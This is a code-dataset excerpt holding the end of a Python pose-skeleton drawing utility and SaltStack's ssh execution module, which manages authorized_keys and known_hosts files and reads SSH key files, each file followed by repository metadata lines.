skeleton Args keypoints numpy array of shape (19, 2): pose to draw in CMU format. ax: matplotlib axis to draw on """ connectivity = CONNECTIVITY_DICT[kind] color = 'blue' if color is None else color if keypoints_mask is None: keypoints_mask = [True] * len(keypoints) # connections for i, (index_from, index_to) in enumerate(connectivity): if kind in COLOR_DICT: color = COLOR_DICT[kind][i] else: color = (0, 0, 255) if keypoints_mask[index_from] and keypoints_mask[index_to]: xs, ys = [np.array([keypoints[index_from, j], keypoints[index_to, j]]) for j in range(2)] ax.plot(xs, ys, c=[c / 255. for c in color], lw=line_width, zorder=1) # points ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], c='red', s=point_size, zorder=2) # if radius is not None: # root_keypoint_index = 0 # xroot, yroot = keypoints[root_keypoint_index, 0], keypoints[root_keypoint_index, 1] # ax.set_xlim([-radius + xroot, radius + xroot]) # ax.set_ylim([-radius + yroot, radius + yroot]) # ax.set_aspect('equal') def draw_2d_pose_cv2(keypoints, canvas, kind='cmu', keypoints_mask=None, point_size=2, point_color=(255, 255, 255), line_width=1, radius=None, color=None, anti_aliasing_scale=1): canvas = canvas.copy() shape = np.array(canvas.shape[:2]) new_shape = shape * anti_aliasing_scale canvas = resize_image(canvas, tuple(new_shape)) keypoints = keypoints * anti_aliasing_scale point_size = point_size * anti_aliasing_scale line_width = line_width * anti_aliasing_scale connectivity = CONNECTIVITY_DICT[kind] color = 'blue' if color is None else color if keypoints_mask is None: keypoints_mask = [True] * len(keypoints) # connections for i, (index_from, index_to) in enumerate(connectivity): if keypoints_mask[index_from] and keypoints_mask[index_to]: pt_from = tuple(np.array(keypoints[index_from, :]).astype(int)) pt_to = tuple(np.array(keypoints[index_to, :]).astype(int)) if kind in COLOR_DICT: color = COLOR_DICT[kind][i] else: color = (0, 0, 255) cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width) if kind == 'coco': mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2 nose = keypoints[0, :] pt_from = tuple(np.array(nose).astype(int)) pt_to = tuple(np.array(mid_collarbone).astype(int)) if kind in COLOR_DICT: color = (153, 0, 51) else: color = (0, 0, 255) cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width) # points for pt in keypoints[keypoints_mask]: cv2.circle(canvas, tuple(pt.astype(int)), point_size, color=point_color, thickness=-1) canvas = resize_image(canvas, tuple(shape)) return canvas def draw_3d_pose(keypoints, ax, keypoints_mask=None, kind='cmu', radius=None, root=None, point_size=2, line_width=2, draw_connections=True): connectivity = CONNECTIVITY_DICT[kind] if keypoints_mask is None: keypoints_mask = [True] * len(keypoints) if draw_connections: # Make connection matrix for i, joint in enumerate(connectivity): if keypoints_mask[joint[0]] and keypoints_mask[joint[1]]: xs, ys, zs = [np.array([keypoints[joint[0], j], keypoints[joint[1], j]]) for j in range(3)] if kind in COLOR_DICT: color = COLOR_DICT[kind][i] else: color = (0, 0, 255) color = np.array(color) / 255 ax.plot(xs, ys, zs, lw=line_width, c=color) if kind == 'coco': mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2 nose = keypoints[0, :] xs, ys, zs = [np.array([nose[j], mid_collarbone[j]]) for j in range(3)] if kind in COLOR_DICT: color = (153, 0, 51) else: color = (0, 0, 255) color = np.array(color) / 255 ax.plot(xs, ys, zs, lw=line_width, c=color) ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], keypoints[keypoints_mask][:, 2], s=point_size, c=np.array([230, 145, 56])/255, edgecolors='black') # np.array([230, 145, 56])/255 if radius is not None: if root is None: root = np.mean(keypoints, axis=0) xroot, yroot, zroot = root ax.set_xlim([-radius + xroot, radius + xroot]) ax.set_ylim([-radius + yroot, radius + yroot]) ax.set_zlim([-radius + zroot, radius + zroot]) ax.set_aspect('equal') # Get rid of the panes background_color = np.array([252, 252, 252]) / 255 ax.w_xaxis.set_pane_color(background_color) ax.w_yaxis.set_pane_color(background_color) ax.w_zaxis.set_pane_color(background_color) # Get rid of the ticks ax.set_xticklabels([]) ax.set_yticklabels([]) ax.set_zticklabels([]) if __name__ == '__main__': fig = plt.figure() ax = fig.add_subplot(111) draw_2d_pose(np.ones((17, 2)), ax)
33.830579
178
0.543545
db5431a85aa344517332f5ef184d8d161f711a87
38,190
py
Python
salt/modules/ssh.py
borgstrom/salt
2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169
[ "Apache-2.0" ]
null
null
null
salt/modules/ssh.py
borgstrom/salt
2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169
[ "Apache-2.0" ]
null
null
null
salt/modules/ssh.py
borgstrom/salt
2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- ''' Manage client ssh components .. note:: This module requires the use of MD5 hashing. Certain security audits may not permit the use of MD5. For those cases, this module should be disabled or removed. ''' from __future__ import absolute_import # Import python libs import os import re import hashlib import binascii import logging import subprocess # Import salt libs import salt.utils import salt.utils.decorators as decorators from salt.exceptions import ( SaltInvocationError, CommandExecutionError, ) from salt.ext.six.moves import range log = logging.getLogger(__name__) DEFAULT_SSH_PORT = 22 def __virtual__(): # TODO: This could work on windows with some love if salt.utils.is_windows(): return (False, 'The module cannot be loaded on windows.') return True def _refine_enc(enc): ''' Return the properly formatted ssh value for the authorized encryption key type. ecdsa defaults to 256 bits, must give full ecdsa enc schema string if using higher enc. If the type is not found, raise CommandExecutionError. ''' rsa = ['r', 'rsa', 'ssh-rsa'] dss = ['d', 'dsa', 'dss', 'ssh-dss'] ecdsa = ['e', 'ecdsa', 'ecdsa-sha2-nistp521', 'ecdsa-sha2-nistp384', 'ecdsa-sha2-nistp256'] ed25519 = ['ed25519', 'ssh-ed25519'] if enc in rsa: return 'ssh-rsa' elif enc in dss: return 'ssh-dss' elif enc in ecdsa: # ecdsa defaults to ecdsa-sha2-nistp256 # otherwise enc string is actual encoding string if enc in ['e', 'ecdsa']: return 'ecdsa-sha2-nistp256' return enc elif enc in ed25519: return 'ssh-ed25519' else: raise CommandExecutionError( 'Incorrect encryption key type \'{0}\'.'.format(enc) ) def _format_auth_line(key, enc, comment, options): ''' Properly format user input. ''' line = '' if options: line += '{0} '.format(','.join(options)) line += '{0} {1} {2}\n'.format(enc, key, comment) return line def _expand_authorized_keys_path(path, user, home): ''' Expand the AuthorizedKeysFile expression. Defined in man sshd_config(5) ''' converted_path = '' had_escape = False for char in path: if had_escape: had_escape = False if char == '%': converted_path += '%' elif char == 'u': converted_path += user elif char == 'h': converted_path += home else: error = 'AuthorizedKeysFile path: unknown token character "%{0}"'.format(char) raise CommandExecutionError(error) continue elif char == '%': had_escape = True else: converted_path += char if had_escape: error = "AuthorizedKeysFile path: Last character can't be escape character" raise CommandExecutionError(error) return converted_path def _get_config_file(user, config): ''' Get absolute path to a user's ssh_config. ''' uinfo = __salt__['user.info'](user) if not uinfo: raise CommandExecutionError('User \'{0}\' does not exist'.format(user)) home = uinfo['home'] if not os.path.isabs(config): config = os.path.join(home, config) config = _expand_authorized_keys_path(config, user, home) return config def _replace_auth_key( user, key, enc='ssh-rsa', comment='', options=None, config='.ssh/authorized_keys'): ''' Replace an existing key ''' auth_line = _format_auth_line(key, enc, comment, options or []) lines = [] full = _get_config_file(user, config) try: # open the file for both reading AND writing with salt.utils.fopen(full, 'r') as _fh: for line in _fh: if line.startswith('#'): # Commented Line lines.append(line) continue comps = line.split() if len(comps) < 2: # Not a valid line lines.append(line) continue key_ind = 1 if comps[0][:4:] not in ['ssh-', 'ecds']: key_ind = 2 if comps[key_ind] == key: lines.append(auth_line) else: lines.append(line) _fh.close() # Re-open the file writable after properly closing it with salt.utils.fopen(full, 'w') as _fh: # Write out any changes _fh.writelines(lines) except (IOError, OSError) as exc: raise CommandExecutionError( 'Problem reading or writing to key file: {0}'.format(exc) ) def _validate_keys(key_file): ''' Return a dict containing validated keys in the passed file ''' ret = {} linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$') try: with salt.utils.fopen(key_file, 'r') as _fh: for line in _fh: if line.startswith('#'): # Commented Line continue # get "{options} key" search = re.search(linere, line) if not search: # not an auth ssh key, perhaps a blank line continue opts = search.group(1) comps = search.group(2).split() if len(comps) < 2: # Not a valid line continue if opts: # It has options, grab them options = opts.split(',') else: options = [] enc = comps[0] key = comps[1] comment = ' '.join(comps[2:]) fingerprint = _fingerprint(key) if fingerprint is None: continue ret[key] = {'enc': enc, 'comment': comment, 'options': options, 'fingerprint': fingerprint} except (IOError, OSError): raise CommandExecutionError( 'Problem reading ssh key file {0}'.format(key_file) ) return ret def _fingerprint(public_key): ''' Return a public key fingerprint based on its base64-encoded representation The fingerprint string is formatted according to RFC 4716 (ch.4), that is, in the form "xx:xx:...:xx" If the key is invalid (incorrect base64 string), return None ''' try: raw_key = public_key.decode('base64') except binascii.Error: return None ret = hashlib.md5(raw_key).hexdigest() chunks = [ret[i:i + 2] for i in range(0, len(ret), 2)] return ':'.join(chunks) def _get_known_hosts_file(config=None, user=None): if user: config = config or '.ssh/known_hosts' else: config = config or '/etc/ssh/ssh_known_hosts' if os.path.isabs(config): full = config else: if user: uinfo = __salt__['user.info'](user) if not uinfo: return {'status': 'error', 'error': 'User {0} does not exist'.format(user)} full = os.path.join(uinfo['home'], config) else: return { 'status': 'error', 'error': 'Cannot determine absolute path to file.' } return full def host_keys(keydir=None, private=True): ''' Return the minion's host keys CLI Example: .. code-block:: bash salt '*' ssh.host_keys salt '*' ssh.host_keys keydir=/etc/ssh salt '*' ssh.host_keys keydir=/etc/ssh private=False ''' # TODO: support parsing sshd_config for the key directory if not keydir: if __grains__['kernel'] == 'Linux': keydir = '/etc/ssh' else: # If keydir is None, os.listdir() will blow up raise SaltInvocationError('ssh.host_keys: Please specify a keydir') keys = {} for fn_ in os.listdir(keydir): if fn_.startswith('ssh_host_'): if fn_.endswith('.pub') is False and private is False: log.info('Skipping private key file {0} as private is set to False'.format(fn_)) continue top = fn_.split('.') comps = top[0].split('_') kname = comps[2] if len(top) > 1: kname += '.{0}'.format(top[1]) try: with salt.utils.fopen(os.path.join(keydir, fn_), 'r') as _fh: # As of RFC 4716 "a key file is a text file, containing a sequence of lines", # although some SSH implementations (e.g. OpenSSH) manage their own format(s). # Please see #20708 for a discussion about how to handle SSH key files in the future keys[kname] = _fh.readline() # only read the whole file if it is not in the legacy 1.1 binary format if keys[kname] != "SSH PRIVATE KEY FILE FORMAT 1.1\n": keys[kname] += _fh.read() keys[kname] = keys[kname].strip() except (IOError, OSError): keys[kname] = '' return keys def auth_keys(user=None, config='.ssh/authorized_keys'): ''' Return the authorized keys for users CLI Example: .. code-block:: bash salt '*' ssh.auth_keys salt '*' ssh.auth_keys root salt '*' ssh.auth_keys user=root salt '*' ssh.auth_keys user="[user1, user2]" ''' if not user: user = __salt__['user.list_users']() old_output_when_one_user = False if not isinstance(user, list): user = [user] old_output_when_one_user = True keys = {} for u in user: full = None try: full = _get_config_file(u, config) except CommandExecutionError: pass if full and os.path.isfile(full): keys[u] = _validate_keys(full) if old_output_when_one_user: if user[0] in keys: return keys[user[0]] else: return {} return keys def check_key_file(user, source, config='.ssh/authorized_keys', saltenv='base', env=None): ''' Check a keyfile from a source destination against the local keys and return the keys to change CLI Example: .. code-block:: bash salt '*' ssh.check_key_file root salt://ssh/keyfile ''' if env is not None: salt.utils.warn_until( 'Boron', 'Passing a salt environment should be done using \'saltenv\' ' 'not \'env\'. This functionality will be removed in Salt Boron.' ) # Backwards compatibility saltenv = env keyfile = __salt__['cp.cache_file'](source, saltenv) if not keyfile: return {} s_keys = _validate_keys(keyfile) if not s_keys: err = 'No keys detected in {0}. Is file properly ' \ 'formatted?'.format(source) log.error(err) __context__['ssh_auth.error'] = err return {} else: ret = {} for key in s_keys: ret[key] = check_key( user, key, s_keys[key]['enc'], s_keys[key]['comment'], s_keys[key]['options'], config) return ret def check_key(user, key, enc, comment, options, config='.ssh/authorized_keys', cache_keys=None): ''' Check to see if a key needs updating, returns "update", "add" or "exists" CLI Example: .. code-block:: bash salt '*' ssh.check_key <user> <key> <enc> <comment> <options> ''' if cache_keys is None: cache_keys = [] enc = _refine_enc(enc) current = auth_keys(user, config) nline = _format_auth_line(key, enc, comment, options) # Removing existing keys from the auth_keys isn't really a good idea # in fact # # as: # - We can have non-salt managed keys in that file # - We can have multiple states defining keys for an user # and with such code only one state will win # the remove all-other-keys war # # if cache_keys: # for pub_key in set(current).difference(set(cache_keys)): # rm_auth_key(user, pub_key) if key in current: cline = _format_auth_line(key, current[key]['enc'], current[key]['comment'], current[key]['options']) if cline != nline: return 'update' else: return 'add' return 'exists' def rm_auth_key_from_file(user, source, config='.ssh/authorized_keys', saltenv='base', env=None): ''' Remove an authorized key from the specified user's authorized key file, using a file as source CLI Example: .. code-block:: bash salt '*' ssh.rm_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub ''' if env is not None: salt.utils.warn_until( 'Boron', 'Passing a salt environment should be done using \'saltenv\' ' 'not \'env\'. This functionality will be removed in Salt Boron.' ) # Backwards compatibility saltenv = env lfile = __salt__['cp.cache_file'](source, saltenv) if not os.path.isfile(lfile): raise CommandExecutionError( 'Failed to pull key file from salt file server' ) s_keys = _validate_keys(lfile) if not s_keys: err = ( 'No keys detected in {0}. Is file properly formatted?'.format( source ) ) log.error(err) __context__['ssh_auth.error'] = err return 'fail' else: rval = '' for key in s_keys: rval += rm_auth_key( user, key, config ) # Due to the ability for a single file to have multiple keys, it's # possible for a single call to this function to have both "replace" # and "new" as possible valid returns. I ordered the following as I # thought best. if 'Key not removed' in rval: return 'Key not removed' elif 'Key removed' in rval: return 'Key removed' else: return 'Key not present' def rm_auth_key(user, key, config='.ssh/authorized_keys'): ''' Remove an authorized key from the specified user's authorized key file CLI Example: .. code-block:: bash salt '*' ssh.rm_auth_key <user> <key> ''' current = auth_keys(user, config) linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$') if key in current: # Remove the key full = _get_config_file(user, config) # Return something sensible if the file doesn't exist if not os.path.isfile(full): return 'Authorized keys file {0} not present'.format(full) lines = [] try: # Read every line in the file to find the right ssh key # and then write out the correct one. Open the file once with salt.utils.fopen(full, 'r') as _fh: for line in _fh: if line.startswith('#'): # Commented Line lines.append(line) continue # get "{options} key" search = re.search(linere, line) if not search: # not an auth ssh key, perhaps a blank line continue comps = search.group(2).split() if len(comps) < 2: # Not a valid line lines.append(line) continue pkey = comps[1] # This is the key we are "deleting", so don't put # it in the list of keys to be re-added back if pkey == key: continue lines.append(line) # Let the context manager do the right thing here and then # re-open the file in write mode to save the changes out. with salt.utils.fopen(full, 'w') as _fh: _fh.writelines(lines) except (IOError, OSError) as exc: log.warn('Could not read/write key file: {0}'.format(str(exc))) return 'Key not removed' return 'Key removed' # TODO: Should this function return a simple boolean? return 'Key not present' def set_auth_key_from_file(user, source, config='.ssh/authorized_keys', saltenv='base', env=None): ''' Add a key to the authorized_keys file, using a file as the source. CLI Example: .. code-block:: bash salt '*' ssh.set_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub ''' if env is not None: salt.utils.warn_until( 'Boron', 'Passing a salt environment should be done using \'saltenv\' ' 'not \'env\'. This functionality will be removed in Salt Boron.' ) # Backwards compatibility saltenv = env # TODO: add support for pulling keys from other file sources as well lfile = __salt__['cp.cache_file'](source, saltenv) if not os.path.isfile(lfile): raise CommandExecutionError( 'Failed to pull key file from salt file server' ) s_keys = _validate_keys(lfile) if not s_keys: err = ( 'No keys detected in {0}. Is file properly formatted?'.format( source ) ) log.error(err) __context__['ssh_auth.error'] = err return 'fail' else: rval = '' for key in s_keys: rval += set_auth_key( user, key, s_keys[key]['enc'], s_keys[key]['comment'], s_keys[key]['options'], config, list(s_keys.keys()) ) # Due to the ability for a single file to have multiple keys, it's # possible for a single call to this function to have both "replace" # and "new" as possible valid returns. I ordered the following as I # thought best. if 'fail' in rval: return 'fail' elif 'replace' in rval: return 'replace' elif 'new' in rval: return 'new' else: return 'no change' def set_auth_key( user, key, enc='ssh-rsa', comment='', options=None, config='.ssh/authorized_keys', cache_keys=None): ''' Add a key to the authorized_keys file. The "key" parameter must only be the string of text that is the encoded key. If the key begins with "ssh-rsa" or ends with user@host, remove those from the key before passing it to this function. CLI Example: .. code-block:: bash salt '*' ssh.set_auth_key <user> '<key>' enc='dsa' ''' if cache_keys is None: cache_keys = [] if len(key.split()) > 1: return 'invalid' enc = _refine_enc(enc) uinfo = __salt__['user.info'](user) if not uinfo: return 'fail' status = check_key(user, key, enc, comment, options, config, cache_keys) if status == 'update': _replace_auth_key(user, key, enc, comment, options or [], config) return 'replace' elif status == 'exists': return 'no change' else: auth_line = _format_auth_line(key, enc, comment, options) fconfig = _get_config_file(user, config) # Fail if the key lives under the user's homedir, and the homedir # doesn't exist udir = uinfo.get('home', '') if fconfig.startswith(udir) and not os.path.isdir(udir): return 'fail' if not os.path.isdir(os.path.dirname(fconfig)): dpath = os.path.dirname(fconfig) os.makedirs(dpath) if os.geteuid() == 0: os.chown(dpath, uinfo['uid'], uinfo['gid']) os.chmod(dpath, 448) # If SELINUX is available run a restorecon on the file rcon = salt.utils.which('restorecon') if rcon: cmd = [rcon, dpath] subprocess.call(cmd) if not os.path.isfile(fconfig): new_file = True else: new_file = False try: with salt.utils.fopen(fconfig, 'a+') as _fh: if new_file is False: # Let's make sure we have a new line at the end of the file _fh.seek(1024, 2) if not _fh.read(1024).rstrip(' ').endswith('\n'): _fh.seek(0, 2) _fh.write('\n') _fh.write('{0}'.format(auth_line)) except (IOError, OSError) as exc: msg = 'Could not write to key file: {0}' raise CommandExecutionError(msg.format(str(exc))) if new_file: if os.geteuid() == 0: os.chown(fconfig, uinfo['uid'], uinfo['gid']) os.chmod(fconfig, 384) # If SELINUX is available run a restorecon on the file rcon = salt.utils.which('restorecon') if rcon: cmd = [rcon, fconfig] subprocess.call(cmd) return 'new' def _parse_openssh_output(lines): ''' Helper function which parses ssh-keygen -F and ssh-keyscan function output and yield dict with keys information, one by one. ''' for line in lines: if line.startswith('#'): continue try: hostname, enc, key = line.split() except ValueError: # incorrect format continue fingerprint = _fingerprint(key) if not fingerprint: continue yield {'hostname': hostname, 'key': key, 'enc': enc, 'fingerprint': fingerprint} @decorators.which('ssh-keygen') def get_known_host(user, hostname, config=None, port=None): ''' Return information about known host from the configfile, if any. If there is no such key, return None. CLI Example: .. code-block:: bash salt '*' ssh.get_known_host <user> <hostname> ''' full = _get_known_hosts_file(config=config, user=user) if isinstance(full, dict): return full ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port) cmd = ['ssh-keygen', '-F', ssh_hostname, '-f', full] lines = __salt__['cmd.run'](cmd, ignore_retcode=True, python_shell=False).splitlines() known_hosts = list(_parse_openssh_output(lines)) return known_hosts[0] if known_hosts else None @decorators.which('ssh-keyscan') def recv_known_host(hostname, enc=None, port=None, hash_hostname=True, hash_known_hosts=True, timeout=5): ''' Retrieve information about host public key from remote server hostname The name of the remote host (e.g. "github.com") enc Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa or ssh-dss port optional parameter, denoting the port of the remote host, which will be used in case, if the public key will be requested from it. By default the port 22 is used. hash_hostname : True Hash all hostnames and addresses in the known hosts file. .. deprecated:: Carbon Please use hash_known_hosts instead. hash_known_hosts : True Hash all hostnames and addresses in the known hosts file. timeout : int Set the timeout for connection attempts. If ``timeout`` seconds have elapsed since a connection was initiated to a host or since the last time anything was read from that host, then the connection is closed and the host in question considered unavailable. Default is 5 seconds. .. versionadded:: Boron CLI Example: .. code-block:: bash salt '*' ssh.recv_known_host <hostname> enc=<enc> port=<port> ''' if not hash_hostname: salt.utils.warn_until( 'Carbon', 'The hash_hostname parameter is misleading as ssh-keygen can only ' 'hash the whole known hosts file, not entries for individual ' 'hosts. Please use hash_known_hosts=False instead.') hash_known_hosts = hash_hostname # The following list of OSes have an old version of openssh-clients # and thus require the '-t' option for ssh-keyscan need_dash_t = ('CentOS-5',) cmd = ['ssh-keyscan'] if port: cmd.extend(['-p', port]) if enc: cmd.extend(['-t', enc]) if not enc and __grains__.get('osfinger') in need_dash_t: cmd.extend(['-t', 'rsa']) if hash_known_hosts: cmd.append('-H') cmd.extend(['-T', str(timeout)]) cmd.append(hostname) lines = __salt__['cmd.run'](cmd, python_shell=False).splitlines() known_hosts = list(_parse_openssh_output(lines)) return known_hosts[0] if known_hosts else None def check_known_host(user=None, hostname=None, key=None, fingerprint=None, config=None, port=None): ''' Check the record in known_hosts file, either by its value or by fingerprint (it's enough to set up either key or fingerprint, you don't need to set up both). If provided key or fingerprint doesn't match with stored value, return "update", if no value is found for a given host, return "add", otherwise return "exists". If neither key, nor fingerprint is defined, then additional validation is not performed. CLI Example: .. code-block:: bash salt '*' ssh.check_known_host <user> <hostname> key='AAAA...FAaQ==' ''' if not hostname: return {'status': 'error', 'error': 'hostname argument required'} if not user: config = config or '/etc/ssh/ssh_known_hosts' else: config = config or '.ssh/known_hosts' known_host = get_known_host(user, hostname, config=config, port=port) if not known_host or 'fingerprint' not in known_host: return 'add' if key: return 'exists' if key == known_host['key'] else 'update' elif fingerprint: return ('exists' if fingerprint == known_host['fingerprint'] else 'update') else: return 'exists' def rm_known_host(user=None, hostname=None, config=None, port=None): ''' Remove all keys belonging to hostname from a known_hosts file. CLI Example: .. code-block:: bash salt '*' ssh.rm_known_host <user> <hostname> ''' if not hostname: return {'status': 'error', 'error': 'hostname argument required'} full = _get_known_hosts_file(config=config, user=user) if isinstance(full, dict): return full if not os.path.isfile(full): return {'status': 'error', 'error': 'Known hosts file {0} does not exist'.format(full)} ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port) cmd = ['ssh-keygen', '-R', ssh_hostname, '-f', full] cmd_result = __salt__['cmd.run'](cmd, python_shell=False) # ssh-keygen creates a new file, thus a chown is required. if os.geteuid() == 0 and user: uinfo = __salt__['user.info'](user) os.chown(full, uinfo['uid'], uinfo['gid']) return {'status': 'removed', 'comment': cmd_result} def set_known_host(user=None, hostname=None, fingerprint=None, key=None, port=None, enc=None, hash_hostname=True, config=None, hash_known_hosts=True, timeout=5): ''' Download SSH public key from remote host "hostname", optionally validate its fingerprint against "fingerprint" variable and save the record in the known_hosts file. If such a record does already exists in there, do nothing. user The user who owns the ssh authorized keys file to modify hostname The name of the remote host (e.g. "github.com") fingerprint The fingerprint of the key which must be presented in the known_hosts file (optional if key specified) key The public key which must be presented in the known_hosts file (optional if fingerprint specified) port optional parameter, denoting the port of the remote host, which will be used in case, if the public key will be requested from it. By default the port 22 is used. enc Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa or ssh-dss hash_hostname : True Hash all hostnames and addresses in the known hosts file. .. deprecated:: Carbon Please use hash_known_hosts instead. config The location of the authorized keys file relative to the user's home directory, defaults to ".ssh/known_hosts". If no user is specified, defaults to "/etc/ssh/ssh_known_hosts". If present, must be an absolute path when a user is not specified. hash_known_hosts : True Hash all hostnames and addresses in the known hosts file. timeout : int Set the timeout for connection attempts. If ``timeout`` seconds have elapsed since a connection was initiated to a host or since the last time anything was read from that host, then the connection is closed and the host in question considered unavailable. Default is 5 seconds. .. versionadded:: Boron CLI Example: .. code-block:: bash salt '*' ssh.set_known_host <user> fingerprint='xx:xx:..:xx' enc='ssh-rsa' config='.ssh/known_hosts' ''' if not hostname: return {'status': 'error', 'error': 'hostname argument required'} if not hash_hostname: salt.utils.warn_until( 'Carbon', 'The hash_hostname parameter is misleading as ssh-keygen can only ' 'hash the whole known hosts file, not entries for individual ' 'hosts. Please use hash_known_hosts=False instead.') hash_known_hosts = hash_hostname if port is not None and port != DEFAULT_SSH_PORT and hash_known_hosts: return {'status': 'error', 'error': 'argument port can not be used in ' 'conjunction with argument hash_known_hosts'} update_required = False check_required = False stored_host = get_known_host(user, hostname, config, port) if not stored_host: update_required = True elif fingerprint and fingerprint != stored_host['fingerprint']: update_required = True elif key and key != stored_host['key']: update_required = True elif key != stored_host['key']: check_required = True if not update_required and not check_required: return {'status': 'exists', 'key': stored_host['key']} if not key: remote_host = recv_known_host(hostname, enc=enc, port=port, hash_known_hosts=hash_known_hosts, timeout=timeout) if not remote_host: return {'status': 'error', 'error': 'Unable to receive remote host key'} if fingerprint and fingerprint != remote_host['fingerprint']: return {'status': 'error', 'error': ('Remote host public key found but its fingerprint ' 'does not match one you have provided')} if check_required: if remote_host['key'] == stored_host['key']: return {'status': 'exists', 'key': stored_host['key']} # remove everything we had in the config so far rm_known_host(user, hostname, config=config) # set up new value full = _get_known_hosts_file(config=config, user=user) if isinstance(full, dict): return full if key: remote_host = {'hostname': hostname, 'enc': enc, 'key': key} if hash_known_hosts or port in [DEFAULT_SSH_PORT, None] or ':' in remote_host['hostname']: line = '{hostname} {enc} {key}\n'.format(**remote_host) else: remote_host['port'] = port line = '[{hostname}]:{port} {enc} {key}\n'.format(**remote_host) # ensure ~/.ssh exists ssh_dir = os.path.dirname(full) if user: uinfo = __salt__['user.info'](user) try: log.debug('Ensuring ssh config dir "{0}" exists'.format(ssh_dir)) os.makedirs(ssh_dir) except OSError as exc: if exc.args[1] == 'Permission denied': log.error('Unable to create directory {0}: ' '{1}'.format(ssh_dir, exc.args[1])) elif exc.args[1] == 'File exists': log.debug('{0} already exists, no need to create ' 'it'.format(ssh_dir)) else: # set proper ownership/permissions if user: os.chown(ssh_dir, uinfo['uid'], uinfo['gid']) os.chmod(ssh_dir, 0o700) # write line to known_hosts file try: with salt.utils.fopen(full, 'a') as ofile: ofile.write(line) except (IOError, OSError) as exception: raise CommandExecutionError( "Couldn't append to known hosts file: '{0}'".format(exception) ) if os.geteuid() == 0 and user: os.chown(full, uinfo['uid'], uinfo['gid']) os.chmod(full, 0o644) if key and hash_known_hosts: cmd_result = __salt__['ssh.hash_known_hosts'](user=user, config=full) return {'status': 'updated', 'old': stored_host, 'new': remote_host} def user_keys(user=None, pubfile=None, prvfile=None): ''' Return the user's ssh keys on the minion .. versionadded:: 2014.7.0 CLI Example: .. code-block:: bash salt '*' ssh.user_keys salt '*' ssh.user_keys user=user1 salt '*' ssh.user_keys user=user1 pubfile=/home/user1/.ssh/id_rsa.pub prvfile=/home/user1/.ssh/id_rsa salt '*' ssh.user_keys user=user1 prvfile=False salt '*' ssh.user_keys user="['user1','user2'] pubfile=id_rsa.pub prvfile=id_rsa As you can see you can tell Salt not to read from the user's private (or public) key file by setting the file path to ``False``. This can be useful to prevent Salt from publishing private data via Salt Mine or others. ''' if not user: user = __salt__['user.list_users']() if not isinstance(user, list): # only one so convert to list user = [user] keys = {} for u in user: keys[u] = {} userinfo = __salt__['user.info'](u) if 'home' not in userinfo: # no home directory, skip continue userKeys = [] if pubfile: userKeys.append(pubfile) elif pubfile is not False: # Add the default public keys userKeys += ['id_rsa.pub', 'id_dsa.pub', 'id_ecdsa.pub', 'id_ed25519.pub'] if prvfile: userKeys.append(prvfile) elif prvfile is not False: # Add the default private keys userKeys += ['id_rsa', 'id_dsa', 'id_ecdsa', 'id_ed25519'] for key in userKeys: if key.startswith('/'): keyname = os.path.basename(key) fn_ = key else: # if not full path, assume key is in .ssh # in user's home directory keyname = key fn_ = '{0}/.ssh/{1}'.format(userinfo['home'], key) if os.path.exists(fn_): try: with salt.utils.fopen(fn_, 'r') as _fh: keys[u][keyname] = ''.join(_fh.readlines()) except (IOError, OSError): pass # clean up any empty items _keys = {} for key in keys: if keys[key]: _keys[key] = keys[key] return _keys @decorators.which('ssh-keygen') def hash_known_hosts(user=None, config=None): ''' Hash all the hostnames in the known hosts file. .. versionadded:: 2014.7.0 user hash known hosts of this user config path to known hosts file: can be absolute or relative to user's home directory CLI Example: .. code-block:: bash salt '*' ssh.hash_known_hosts ''' full = _get_known_hosts_file(config=config, user=user) if isinstance(full, dict): return full # full contains error information if not os.path.isfile(full): return {'status': 'error', 'error': 'Known hosts file {0} does not exist'.format(full)} cmd = ['ssh-keygen', '-H', '-f', full] cmd_result = __salt__['cmd.run'](cmd, python_shell=False) # ssh-keygen creates a new file, thus a chown is required. if os.geteuid() == 0 and user: uinfo = __salt__['user.info'](user) os.chown(full, uinfo['uid'], uinfo['gid']) return {'status': 'updated', 'comment': cmd_result} def _hostname_and_port_to_ssh_hostname(hostname, port=DEFAULT_SSH_PORT): if not port or port == DEFAULT_SSH_PORT: return hostname else: return '[{0}]:{1}'.format(hostname, port)
31.535921
109
0.56177
4306426a804a389616a5919b964ad80081e71ea5
4,771
py
Python
src/classifier/routing.py
chengemily/Distributional-Signatures
7ef96f9cfc8aeb2fb54e117e3968e4390aaad819
[ "MIT" ]
243
2019-08-15T18:34:09.000Z
2022-03-31T11:51:00.000Z
src/classifier/routing.py
phymucs/460d60d2c25a118c67dcbfdd37f27d6c
cd7e4659fc9761a8af046e824853aa338b22f2f6
[ "MIT" ]
34
2019-10-22T08:11:28.000Z
2022-03-19T08:03:30.000Z
src/classifier/routing.py
phymucs/460d60d2c25a118c67dcbfdd37f27d6c
cd7e4659fc9761a8af046e824853aa338b22f2f6
[ "MIT" ]
54
2019-08-19T16:11:49.000Z
2022-03-31T05:36:01.000Z
